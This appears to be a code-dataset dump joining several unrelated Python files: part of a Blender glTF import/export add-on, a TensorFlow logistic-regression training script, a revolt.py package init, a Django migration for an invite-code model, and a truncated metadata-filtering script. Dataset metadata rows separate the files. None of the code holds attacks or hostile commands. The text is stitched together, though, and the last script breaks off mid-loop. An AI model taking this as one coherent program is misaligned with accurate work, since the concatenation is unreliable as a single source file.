        default=False
    )
    export_skins = BoolProperty(
        name='Skinning',
        description='Export skinning (armature) data',
        default=True
    )
    export_all_influences = BoolProperty(
        name='Include All Bone Influences',
        description='Allow >4 joint vertex influences. Models may appear incorrectly in many viewers',
        default=False
    )
    export_morph = BoolProperty(
        name='Shape Keys',
        description='Export shape keys (morph targets)',
        default=True
    )
    export_morph_normal = BoolProperty(
        name='Shape Key Normals',
        description='Export vertex normals with shape keys (morph targets)',
        default=True
    )
    export_morph_tangent = BoolProperty(
        name='Shape Key Tangents',
        description='Export vertex tangents with shape keys (morph targets)',
        default=False
    )
    export_lights = BoolProperty(
        name='Punctual Lights',
        description='Export directional, point, and spot lights. '
                    'Uses "KHR_lights_punctual" glTF extension',
        default=False
    )
    export_displacement = BoolProperty(
        name='Displacement Textures (EXPERIMENTAL)',
        description='EXPERIMENTAL: Export displacement textures. '
                    'Uses incomplete "KHR_materials_displacement" glTF extension',
        default=False
    )
    will_save_settings = BoolProperty(
        name='Remember Export Settings',
        description='Store glTF export settings in the Blender project',
        default=False)
    # Custom scene property for saving settings
    scene_key = "glTF2ExportSettings"
    #
    def invoke(self, context, event):
        """Restore previously saved export settings from the scene, if any.

        Corrupted/stale saved settings are discarded (and the scene key
        removed) rather than aborting the export dialog.
        """
        settings = context.scene.get(self.scene_key)
        self.will_save_settings = False
        if settings:
            try:
                for (k, v) in settings.items():
                    setattr(self, k, v)
                self.will_save_settings = True
            except (AttributeError, TypeError):
                self.report({"ERROR"}, "Loading export settings failed. Removed corrupted settings")
                del context.scene[self.scene_key]
        return ExportHelper.invoke(self, context, event)
    def save_settings(self, context):
        """Persist all non-None ``export_*`` properties onto the scene."""
        # find all export_ props
        all_props = self.properties
        export_props = {x: getattr(self, x) for x in dir(all_props)
                        if x.startswith("export_") and all_props.get(x) is not None}
        context.scene[self.scene_key] = export_props
    def execute(self, context):
        """Build the ``export_settings`` dict from the operator properties and run the export."""
        import os
        import datetime
        from .blender.exp import gltf2_blender_export
        if self.will_save_settings:
            self.save_settings(context)
        # Pick the output extension from the chosen container format.
        if self.export_format == 'GLB':
            self.filename_ext = '.glb'
        else:
            self.filename_ext = '.gltf'
        # All custom export settings are stored in this container.
        export_settings = {}
        export_settings['timestamp'] = datetime.datetime.now()
        export_settings['gltf_filepath'] = bpy.path.ensure_ext(self.filepath, self.filename_ext)
        export_settings['gltf_filedirectory'] = os.path.dirname(export_settings['gltf_filepath']) + '/'
        export_settings['gltf_format'] = self.export_format
        export_settings['gltf_image_format'] = self.export_image_format
        export_settings['gltf_copyright'] = self.export_copyright
        export_settings['gltf_texcoords'] = self.export_texcoords
        export_settings['gltf_normals'] = self.export_normals
        # Tangents are meaningless without normals.
        export_settings['gltf_tangents'] = self.export_tangents and self.export_normals
        # Draco settings are only honoured when the DLL was found at startup.
        if self.is_draco_available:
            export_settings['gltf_draco_mesh_compression'] = self.export_draco_mesh_compression_enable
            export_settings['gltf_draco_mesh_compression_level'] = self.export_draco_mesh_compression_level
            export_settings['gltf_draco_position_quantization'] = self.export_draco_position_quantization
            export_settings['gltf_draco_normal_quantization'] = self.export_draco_normal_quantization
            export_settings['gltf_draco_texcoord_quantization'] = self.export_draco_texcoord_quantization
        else:
            export_settings['gltf_draco_mesh_compression'] = False
        export_settings['gltf_materials'] = self.export_materials
        export_settings['gltf_colors'] = self.export_colors
        export_settings['gltf_cameras'] = self.export_cameras
        export_settings['gltf_selected'] = self.export_selected
        export_settings['gltf_layers'] = True # self.export_layers
        export_settings['gltf_extras'] = self.export_extras
        export_settings['gltf_yup'] = self.export_yup
        export_settings['gltf_apply'] = self.export_apply
        export_settings['gltf_current_frame'] = self.export_current_frame
        export_settings['gltf_animations'] = self.export_animations
        # Animation sub-options only apply when animation export is on;
        # otherwise force them off so downstream code sees a consistent dict.
        if self.export_animations:
            export_settings['gltf_frame_range'] = self.export_frame_range
            export_settings['gltf_force_sampling'] = self.export_force_sampling
            if self.export_force_sampling:
                export_settings['gltf_def_bones'] = self.export_def_bones
            else:
                export_settings['gltf_def_bones'] = False
            export_settings['gltf_nla_strips'] = self.export_nla_strips
        else:
            export_settings['gltf_frame_range'] = False
            export_settings['gltf_move_keyframes'] = False
            export_settings['gltf_force_sampling'] = False
            export_settings['gltf_def_bones'] = False
        export_settings['gltf_skins'] = self.export_skins
        if self.export_skins:
            export_settings['gltf_all_vertex_influences'] = self.export_all_influences
        else:
            export_settings['gltf_all_vertex_influences'] = False
        export_settings['gltf_frame_step'] = self.export_frame_step
        export_settings['gltf_morph'] = self.export_morph
        if self.export_morph:
            export_settings['gltf_morph_normal'] = self.export_morph_normal
        else:
            export_settings['gltf_morph_normal'] = False
        # Morph tangents additionally require morph normals.
        if self.export_morph and self.export_morph_normal:
            export_settings['gltf_morph_tangent'] = self.export_morph_tangent
        else:
            export_settings['gltf_morph_tangent'] = False
        export_settings['gltf_lights'] = self.export_lights
        export_settings['gltf_displacement'] = self.export_displacement
        export_settings['gltf_binary'] = bytearray()
        export_settings['gltf_binaryfilename'] = os.path.splitext(os.path.basename(
            bpy.path.ensure_ext(self.filepath,self.filename_ext)))[0] + '.bin'
        return gltf2_blender_export.save(context, export_settings)
    # Legacy tabbed UI for Blender < 2.80; on 2.80+ the draw() is a no-op and
    # the GLTF_PT_export_* sub-panels below provide the UI instead.
    if bpy.app.version < (2, 80, 0):
        def draw(self, context):
            self.layout.prop(self, 'ui_tab', expand=True)
            if self.ui_tab == 'GENERAL':
                self.draw_general_settings()
            elif self.ui_tab == 'MESHES':
                self.draw_mesh_settings()
            elif self.ui_tab == 'OBJECTS':
                self.draw_object_settings()
            elif self.ui_tab == 'MATERIALS':
                self.draw_material_settings()
            elif self.ui_tab == 'ANIMATION':
                self.draw_animation_settings()
        def draw_general_settings(self):
            col = self.layout.box().column()
            col.prop(self, 'export_format')
            col.prop(self, 'export_selected')
            col.prop(self, 'export_apply')
            col.prop(self, 'export_yup')
            col.prop(self, 'export_extras')
            col.prop(self, 'will_save_settings')
            col.prop(self, 'export_copyright')
        def draw_mesh_settings(self):
            col = self.layout.box().column()
            col.prop(self, 'export_texcoords')
            col.prop(self, 'export_normals')
            if self.export_normals:
                col.prop(self, 'export_tangents')
            col.prop(self, 'export_colors')
            col.prop(self, 'export_materials')
            if self.export_materials:
                col.prop(self, 'export_image_format')
            # Add Draco compression option only if the DLL could be found.
            if self.is_draco_available:
                col.prop(self, 'export_draco_mesh_compression_enable')
            # Display options when Draco compression is enabled.
            if self.export_draco_mesh_compression_enable:
                col.prop(self, 'export_draco_mesh_compression_level')
                col.prop(self, 'export_draco_position_quantization')
                col.prop(self, 'export_draco_normal_quantization')
                col.prop(self, 'export_draco_texcoord_quantization')
        def draw_object_settings(self):
            col = self.layout.box().column()
            col.prop(self, 'export_cameras')
            col.prop(self, 'export_lights')
        def draw_animation_settings(self):
            col = self.layout.box().column()
            col.prop(self, 'export_current_frame')
            col.prop(self, 'export_animations')
            if self.export_animations:
                col.prop(self, 'export_frame_range')
                col.prop(self, 'export_frame_step')
                col.prop(self, 'export_force_sampling')
                if self.export_force_sampling:
                    col.prop(self, 'export_def_bones')
                col.prop(self, 'export_skins')
                if self.export_skins:
                    col.prop(self, 'export_all_influences')
                col.prop(self, 'export_morph')
                if self.export_morph:
                    col.prop(self, 'export_morph_normal')
                    if self.export_morph_normal:
                        col.prop(self, 'export_morph_tangent')
    else:
        def draw(self, context):
            pass
class GLTF_PT_export_main(bpy.types.Panel):
    """Header-less sub-panel with the top-level glTF export options."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = ""
    bl_parent_id = "FILE_PT_operator"
    bl_options = {'HIDE_HEADER'}

    @classmethod
    def poll(cls, context):
        # Only attach beneath the glTF export operator's file-browser panel.
        return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw(self, context):
        exporter = context.space_data.active_operator
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.
        for prop_name in ('export_format', 'export_copyright', 'will_save_settings'):
            layout.prop(exporter, prop_name)
class GLTF_PT_export_include(bpy.types.Panel):
    """Collapsed "Include" sub-panel: which scene data to export."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Include"
    bl_parent_id = "FILE_PT_operator"
    bl_options = {'DEFAULT_CLOSED'}

    @classmethod
    def poll(cls, context):
        # Only attach beneath the glTF export operator's file-browser panel.
        return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw(self, context):
        exporter = context.space_data.active_operator
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.
        for prop_name in ('export_selected', 'export_extras',
                          'export_cameras', 'export_lights'):
            layout.prop(exporter, prop_name)
class GLTF_PT_export_transform(bpy.types.Panel):
    """Export sub-panel for coordinate-system (Y-up) conversion."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Transform"
    bl_parent_id = "FILE_PT_operator"
    bl_options = {'DEFAULT_CLOSED'}

    @classmethod
    def poll(cls, context):
        # Only show this panel while the glTF export operator is active.
        sfile = context.space_data
        operator = sfile.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw(self, context):
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.

        sfile = context.space_data
        operator = sfile.active_operator

        layout.prop(operator, 'export_yup')
class GLTF_PT_export_geometry(bpy.types.Panel):
    """Export sub-panel with mesh/material geometry options."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Geometry"
    bl_parent_id = "FILE_PT_operator"
    bl_options = {'DEFAULT_CLOSED'}

    @classmethod
    def poll(cls, context):
        # Only show this panel while the glTF export operator is active.
        sfile = context.space_data
        operator = sfile.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw(self, context):
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.

        sfile = context.space_data
        operator = sfile.active_operator

        layout.prop(operator, 'export_apply')
        layout.prop(operator, 'export_texcoords')
        layout.prop(operator, 'export_normals')
        # Tangents depend on normals being exported, so grey them out otherwise.
        col = layout.column()
        col.active = operator.export_normals
        col.prop(operator, 'export_tangents')
        layout.prop(operator, 'export_colors')
        layout.prop(operator, 'export_materials')
        # Image format only matters when materials are exported.
        col = layout.column()
        col.active = operator.export_materials
        col.prop(operator, 'export_image_format')
class GLTF_PT_export_geometry_compression(bpy.types.Panel):
    """Export sub-panel with the Draco mesh-compression settings."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Compression"
    bl_parent_id = "GLTF_PT_export_geometry"
    bl_options = {'DEFAULT_CLOSED'}

    def __init__(self):
        # Cache whether the Draco shared library ships with this build so the
        # panel can be hidden on builds without it.
        from io_scene_gltf2.io.exp import gltf2_io_draco_compression_extension
        self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists()

    @classmethod
    def poll(cls, context):
        """Show only for the glTF exporter, and only when Draco is available.

        Fixed to always return an explicit bool: the original fell off the end
        and implicitly returned None when Draco was unavailable.
        """
        sfile = context.space_data
        operator = sfile.active_operator
        if not operator.is_draco_available:
            return False
        return operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw_header(self, context):
        # Checkbox in the panel header toggles compression on/off.
        sfile = context.space_data
        operator = sfile.active_operator
        self.layout.prop(operator, "export_draco_mesh_compression_enable", text="")

    def draw(self, context):
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.

        sfile = context.space_data
        operator = sfile.active_operator

        # Grey out all settings unless compression is enabled.
        layout.active = operator.export_draco_mesh_compression_enable

        layout.prop(operator, 'export_draco_mesh_compression_level')

        col = layout.column(align=True)
        col.prop(operator, 'export_draco_position_quantization', text="Quantize Position")
        col.prop(operator, 'export_draco_normal_quantization', text="Normal")
        col.prop(operator, 'export_draco_texcoord_quantization', text="Tex Coords")
class GLTF_PT_export_animation(bpy.types.Panel):
    """Export sub-panel grouping the animation-related options."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Animation"
    bl_parent_id = "FILE_PT_operator"
    bl_options = {'DEFAULT_CLOSED'}

    @classmethod
    def poll(cls, context):
        # Only show this panel while the glTF export operator is active.
        sfile = context.space_data
        operator = sfile.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw(self, context):
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.

        sfile = context.space_data
        operator = sfile.active_operator

        layout.prop(operator, 'export_current_frame')
class GLTF_PT_export_animation_export(bpy.types.Panel):
    """Animation sub-panel; header checkbox enables animation export."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Animation"
    bl_parent_id = "GLTF_PT_export_animation"
    bl_options = {'DEFAULT_CLOSED'}

    @classmethod
    def poll(cls, context):
        # Only show this panel while the glTF export operator is active.
        sfile = context.space_data
        operator = sfile.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw_header(self, context):
        sfile = context.space_data
        operator = sfile.active_operator
        self.layout.prop(operator, "export_animations", text="")

    def draw(self, context):
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.

        sfile = context.space_data
        operator = sfile.active_operator

        # Grey out everything unless animation export is enabled.
        layout.active = operator.export_animations

        layout.prop(operator, 'export_frame_range')
        layout.prop(operator, 'export_frame_step')
        layout.prop(operator, 'export_force_sampling')
        layout.prop(operator, 'export_nla_strips')
        # Bone filtering requires sampled animations.
        row = layout.row()
        row.active = operator.export_force_sampling
        row.prop(operator, 'export_def_bones')
class GLTF_PT_export_animation_shapekeys(bpy.types.Panel):
    """Animation sub-panel; header checkbox enables shape-key (morph) export."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Shape Keys"
    bl_parent_id = "GLTF_PT_export_animation"
    bl_options = {'DEFAULT_CLOSED'}

    @classmethod
    def poll(cls, context):
        # Only show this panel while the glTF export operator is active.
        sfile = context.space_data
        operator = sfile.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw_header(self, context):
        sfile = context.space_data
        operator = sfile.active_operator
        self.layout.prop(operator, "export_morph", text="")

    def draw(self, context):
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.

        sfile = context.space_data
        operator = sfile.active_operator

        # Grey out everything unless morph export is enabled.
        layout.active = operator.export_morph

        layout.prop(operator, 'export_morph_normal')
        # Morph tangents require morph normals.
        col = layout.column()
        col.active = operator.export_morph_normal
        col.prop(operator, 'export_morph_tangent')
class GLTF_PT_export_animation_skinning(bpy.types.Panel):
    """Animation sub-panel; header checkbox enables skinning export."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Skinning"
    bl_parent_id = "GLTF_PT_export_animation"
    bl_options = {'DEFAULT_CLOSED'}

    @classmethod
    def poll(cls, context):
        # Only show this panel while the glTF export operator is active.
        sfile = context.space_data
        operator = sfile.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_gltf"

    def draw_header(self, context):
        sfile = context.space_data
        operator = sfile.active_operator
        self.layout.prop(operator, "export_skins", text="")

    def draw(self, context):
        layout = self.layout
        layout.use_property_split = True
        layout.use_property_decorate = False  # No animation.

        sfile = context.space_data
        operator = sfile.active_operator

        # Grey out everything unless skin export is enabled.
        layout.active = operator.export_skins

        layout.prop(operator, 'export_all_influences')
class ExportGLTF2(bpy.types.Operator, ExportGLTF2_Base, ExportHelper):
    """Export scene as glTF 2.0 file"""
    bl_idname = 'export_scene.gltf'
    bl_label = 'Export glTF 2.0'

    # Extension is decided at export time (.glb or .gltf) by the chosen format.
    filename_ext = ''

    filter_glob = StringProperty(default='*.glb;*.gltf', options={'HIDDEN'})
def menu_func_export(self, context):
    """Add the glTF 2.0 exporter entry to the File > Export menu."""
    self.layout.operator(ExportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')
class ImportGLTF2(Operator, ImportHelper):
    """Load a glTF 2.0 file"""
    bl_idname = 'import_scene.gltf'
    bl_label = 'Import glTF 2.0'

    filter_glob = StringProperty(default="*.glb;*.gltf", options={'HIDDEN'})

    # Selected files: allows importing several .glb/.gltf at once.
    files = CollectionProperty(
        name="File Path",
        type=bpy.types.OperatorFileListElement,
    )

    # Filled in by set_debug_log() from Blender's --debug-value.
    loglevel = IntProperty(
        name='Log Level',
        description="Log Level")

    import_pack_images = BoolProperty(
        name='Pack images',
        description='Pack all images into .blend file',
        default=True
    )

    import_shading = EnumProperty(
        name="Shading",
        items=(("NORMALS", "Use Normal Data", ""),
               ("FLAT", "Flat Shading", ""),
               ("SMOOTH", "Smooth Shading", "")),
        description="How normals are computed during import",
        default="NORMALS")

    def draw(self, context):
        """Draw the import options in the file-browser sidebar."""
        layout = self.layout

        layout.prop(self, 'import_pack_images')
        layout.prop(self, 'import_shading')

    def execute(self, context):
        """Blender operator entry point."""
        return self.import_gltf2(context)

    def import_gltf2(self, context):
        """Import every selected file; returns a Blender operator status set."""
        import os

        self.set_debug_log()
        import_settings = self.as_keywords()

        if self.files:
            # Multiple file import
            ret = {'CANCELLED'}
            dirname = os.path.dirname(self.filepath)
            for file in self.files:
                path = os.path.join(dirname, file.name)
                # Report FINISHED if at least one file imported successfully.
                if self.unit_import(path, import_settings) == {'FINISHED'}:
                    ret = {'FINISHED'}
            return ret
        else:
            # Single file import
            return self.unit_import(self.filepath, import_settings)

    def unit_import(self, filename, import_settings):
        """Parse one glTF file and create the corresponding Blender data."""
        import time
        from .io.imp.gltf2_io_gltf import glTFImporter
        from .blender.imp.gltf2_blender_gltf import BlenderGlTF

        self.gltf_importer = glTFImporter(filename, import_settings)
        success, txt = self.gltf_importer.read()
        if not success:
            self.report({'ERROR'}, txt)
            return {'CANCELLED'}
        success, txt = self.gltf_importer.checks()
        if not success:
            self.report({'ERROR'}, txt)
            return {'CANCELLED'}
        # Logged at CRITICAL so the message appears regardless of log level.
        self.gltf_importer.log.critical("Data are loaded, start creating Blender stuff")
        start_time = time.time()
        BlenderGlTF.create(self.gltf_importer)
        elapsed_s = "{:.2f}s".format(time.time() - start_time)
        self.gltf_importer.log.critical("glTF import finished in " + elapsed_s)

        self.gltf_importer.log.removeHandler(self.gltf_importer.log_handler)

        return {'FINISHED'}

    def set_debug_log(self):
        """Map Blender's --debug-value setting to a Python logging level."""
        import logging
        if bpy.app.debug_value == 0:
            self.loglevel = logging.CRITICAL
        elif bpy.app.debug_value == 1:
            self.loglevel = logging.ERROR
        elif bpy.app.debug_value == 2:
            self.loglevel = logging.WARNING
        elif bpy.app.debug_value == 3:
            self.loglevel = logging.INFO
        else:
            self.loglevel = logging.NOTSET
def menu_func_import(self, context):
    """Add the glTF 2.0 importer entry to the File > Import menu."""
    self.layout.operator(ImportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')
# The file-browser sub-panels rely on UI features introduced in Blender 2.80,
# so on older versions only the two operators are registered.
if bpy.app.version < (2, 80, 0):
    classes = (
        ExportGLTF2,
        ImportGLTF2
    )
else:
    classes = (
        ExportGLTF2,
        GLTF_PT_export_main,
        GLTF_PT_export_include,
        GLTF_PT_export_transform,
        GLTF_PT_export_geometry,
        GLTF_PT_export_geometry_compression,
        GLTF_PT_export_animation,
        GLTF_PT_export_animation_export,
        GLTF_PT_export_animation_shapekeys,
        GLTF_PT_export_animation_skinning,
        ImportGLTF2
    )
def register():
    """Register all add-on classes and hook the import/export menu entries."""
    for c in classes:
        bpy.utils.register_class(c)
    # bpy.utils.register_module(__name__)

    # add to the export / import menu
    if bpy.app.version < (2, 80, 0):
        bpy.types.INFO_MT_file_export.append(menu_func_export)
        bpy.types.INFO_MT_file_import.append(menu_func_import)
    else:
        # Blender 2.80 renamed the INFO file menus to TOPBAR.
        bpy.types.TOPBAR_MT_file_export.append(menu_func_export)
        bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
    """Unregister all add-on classes and remove the menu entries."""
    for c in classes:
        bpy.utils.unregister_class(c)
    # bpy.utils.unregister_module(__name__)

    # remove from the export / import menu
    if bpy.app.version < (2, 80, 0):
        bpy.types.INFO_MT_file_export.remove(menu_func_export)
        bpy.types.INFO_MT_file_import.remove(menu_func_import)
    else:
        # Blender 2.80 renamed the INFO file menus to TOPBAR.
        bpy.types.TOPBAR_MT_file_export.remove(menu_func_export)
        bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
| 34.121849 | 147 | 0.646164 |
795c7855b29438d83e342fa0aef143712eb27ec0 | 6,070 | py | Python | mydeepctr/examples/lr/controller.py | Liulinghzi/DeepCTR | bb3f204e368ad34d84639025480613abd99231c5 | [
"Apache-2.0"
] | null | null | null | mydeepctr/examples/lr/controller.py | Liulinghzi/DeepCTR | bb3f204e368ad34d84639025480613abd99231c5 | [
"Apache-2.0"
] | null | null | null | mydeepctr/examples/lr/controller.py | Liulinghzi/DeepCTR | bb3f204e368ad34d84639025480613abd99231c5 | [
"Apache-2.0"
] | null | null | null | '''
@Author: your name
@Date: 2020-05-27 14:53:55
@LastEditTime: 2020-06-09 13:07:02
@LastEditors: Please set LastEditors
@Description: In User Settings Edit
@FilePath: /model-building/recommend/estimator/lr.py
'''
import tensorflow as tf
import os
import sys
import json
import argparse
tf.logging.set_verbosity(tf.logging.INFO)

# ================================= Pre-built tfrecord files =================================
parser = argparse.ArgumentParser()
parser.add_argument("--tfrecord_dir", type=str, default="../data/")
parser.add_argument("--project_dir", type=str, default=None)
parser.add_argument("--output_dir", type=str, default=None)
parser.add_argument("--mode", type=str, default='train')
parser.add_argument("--dense_cols", type=str, default=None)
parser.add_argument("--sparse_cols", type=str, default=None)
parser.add_argument("--seq_cols", type=str, default=None)
parser.add_argument("--target", type=str, default=None)
parser.add_argument("--vocab_list", type=str, default=None)
parser.add_argument("--exclude", type=str, default="")
parser.add_argument("--batch_size", type=int, default=10)
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epoches", type=int, default=10)
parser.add_argument("--num_examples", type=int, default=100)
parser.add_argument('--use_bn', action='store_true', default=False)
parser.add_argument('--use_deep', action='store_true', default=False)
parser.add_argument("--log_step_count_steps", type=int, default=1000)
parser.add_argument("--save_checkpoints_steps", type=int, default=1000)
parser.add_argument("--summary_save_dir", type=str, default='./log/summary/')
parser.add_argument("--summary_every_n_step", type=int, default=1000)
parser.add_argument("--ckpt_save_dir", type=str, default='./log/summary/')
args = parser.parse_args()

# Project modules only become importable after project_dir is on sys.path.
sys.path.append(args.project_dir)
from models.lr import LRConfig
from inputs import DenseFeature, SparseFeature
from model import model_fn_builder
from data import tfrecord2fn,csv2tfrecord

# ================================= Environment configuration =================================
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
num_train_steps = args.num_examples / args.batch_size * args.num_epoches

# ================================= Model definition =================================
if args.dense_cols is None:
    dense_features = []
else:
    dense_features = [f.strip() for f in args.dense_cols.split(',')]
if args.sparse_cols is None:
    sparse_features = []
    vocab_list = []
    vocab_dict = {}
else:
    sparse_features = [f.strip() for f in args.sparse_cols.split(',')]
    vocab_list = [int(v.strip()) for v in args.vocab_list.split(',')]
    # Vocab sizes are given positionally, one per sparse column.
    vocab_dict = {feat:vocab_list[idx] for idx, feat in enumerate(sparse_features)}

sparse_feature_columns = [SparseFeature(feature_name=feat, vocab_size=vocab_dict[feat], embedding_dim=3) for feat in sparse_features]
dense_feature_columns = [DenseFeature(feature_name=feat) for feat in dense_features]
dnn_feature_columns = dense_feature_columns + sparse_feature_columns
linear_feature_columns = dense_feature_columns + sparse_feature_columns

model_config = LRConfig(dnn_feature_columns, linear_feature_columns, class_num=2)
model_fn = model_fn_builder(
    model_config=model_config,
    learning_rate=args.learning_rate,
    init_checkpoint=None,
    summary_save_dir=args.summary_save_dir,
    summary_every_n_step=args.summary_every_n_step,
    task='binary_classification'
)

# ================================= Estimator configuration =================================
session_config = tf.ConfigProto(allow_soft_placement=True)
run_config = tf.estimator.RunConfig(
    log_step_count_steps=args.log_step_count_steps,
    save_checkpoints_steps=args.save_checkpoints_steps,
    session_config=session_config,
    model_dir=args.ckpt_save_dir
)
estimator = tf.estimator.Estimator(
    model_fn=model_fn,
    model_dir=args.ckpt_save_dir,
    params={},
    config=run_config
)

# ================================= Estimator execution =================================
# ======================== Build inputs ========================
# Describe the tfrecord feature schema.
name2features = {}
for f in sparse_features:
    name2features[f] = tf.io.FixedLenFeature([], tf.int64)
for f in dense_features:
    name2features[f] = tf.io.FixedLenFeature([], tf.float32)
for f in [args.target]:
    name2features[f] = tf.io.FixedLenFeature([], tf.float32)

if args.mode == 'train':
    train_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'train.tfrecord'), name2features, args.batch_size, args.num_epoches,drop_remainder=True, mode=tf.estimator.ModeKeys.TRAIN, target=args.target)
elif args.mode == 'eval':
    eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.EVAL, target=args.target)
elif args.mode == 'test':
    # NOTE(review): 'test' builds a PREDICT-mode input_fn, but no predict
    # branch exists below, so this input_fn is currently never used.
    eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.PREDICT, target=args.target)

# ======================== Run training ========================
try:
    early_stopping_hook = tf.estimator.experimental.stop_if_no_decrease_hook(
        estimator=estimator,
        metric_name='eval_loss',
        max_steps_without_decrease=1000,
        run_every_secs=None,
        run_every_steps=1000
    )
except:
    # Older TF releases expose the hook under tf.contrib instead.
    early_stopping_hook = tf.contrib.estimator.stop_if_no_decrease_hook(
        estimator=estimator,
        metric_name='eval_loss',
        max_steps_without_decrease=1000,
        run_every_secs=None,
        run_every_steps=1000
    )

if args.mode == 'train':
    estimator.train(train_input_fn, max_steps=num_train_steps)
elif args.mode == 'eval':
    res = estimator.evaluate(eval_input_fn)
    print(res)
    # Convert numpy scalars to plain floats so the dict is JSON-serializable.
    res = {k:float(res[k]) for k in res}
    if not os.path.exists(args.output_dir):
        os.makedirs(args.output_dir)
    with open(os.path.join(args.output_dir, 'result.json'), 'w') as f:
        json.dump(res, f)
| 39.673203 | 208 | 0.691928 |
795c78641403b17aae37d2faf634124d1b793c05 | 614 | py | Python | revolt/__init__.py | XiehCanCode/revolt.py | 0b14143610f544d73ba9dde02adedafc51d76228 | [
"MIT"
] | null | null | null | revolt/__init__.py | XiehCanCode/revolt.py | 0b14143610f544d73ba9dde02adedafc51d76228 | [
"MIT"
] | null | null | null | revolt/__init__.py | XiehCanCode/revolt.py | 0b14143610f544d73ba9dde02adedafc51d76228 | [
"MIT"
] | null | null | null | from .asset import Asset
from .channel import (Channel, DMChannel, GroupDMChannel, SavedMessageChannel,
TextChannel, VoiceChannel)
from .client import Client
from .embed import Embed
from .enums import AssetType, ChannelType, PresenceType, RelationshipType, SortType
from .errors import HTTPError, RevoltError, ServerError
from .file import File
from .member import Member
from .message import Message
from .messageable import Messageable
from .permissions import Permissions
from .role import Role
from .server import Server
from .user import Relation, Status, User
__version__ = (0, 0, 1)
| 34.111111 | 83 | 0.786645 |
795c786d4d0f97caf8d1fdae3be96e252f939d35 | 742 | py | Python | auth/migrations/0001_initial.py | JohnAzedo/NewsletterServer | 0e9df39afcbb148064a8e25890597676e0e22a57 | [
"MIT"
] | 1 | 2021-11-30T23:44:25.000Z | 2021-11-30T23:44:25.000Z | auth/migrations/0001_initial.py | JohnAzedo/NewsletterServer | 0e9df39afcbb148064a8e25890597676e0e22a57 | [
"MIT"
] | null | null | null | auth/migrations/0001_initial.py | JohnAzedo/NewsletterServer | 0e9df39afcbb148064a8e25890597676e0e22a57 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-04-10 00:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the InviteCode model linked to a user."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='InviteCode',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=10)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 28.538462 | 118 | 0.641509 |
795c7971f438b9dffc216d8a05e45153776ec280 | 887 | py | Python | various_scripts/metadata_script.py | cc-ai/floods-gans | 787dc2a3c08483c68a687b4355c0f0f6f2711ab9 | [
"Apache-2.0"
] | 5 | 2019-05-07T15:14:58.000Z | 2020-11-23T00:21:50.000Z | various_scripts/metadata_script.py | cc-ai/floods | 787dc2a3c08483c68a687b4355c0f0f6f2711ab9 | [
"Apache-2.0"
] | 13 | 2019-04-25T01:06:20.000Z | 2022-03-11T23:51:04.000Z | various_scripts/metadata_script.py | cc-ai/floods | 787dc2a3c08483c68a687b4355c0f0f6f2711ab9 | [
"Apache-2.0"
] | 4 | 2019-04-24T18:06:10.000Z | 2020-07-15T18:02:56.000Z | # run command : python3 metadata_script.py log_dir img_dir
# log_dir is the logs folder
# img_dir is the downloads folder
import json
import os
import sys
import os.path

log_dir = sys.argv[1]
img_dir = sys.argv[2]

# For every log JSON, keep only entries whose image file actually exists under
# img_dir/<log-name>/, then rewrite the log file in place.
for filename in os.listdir(log_dir):
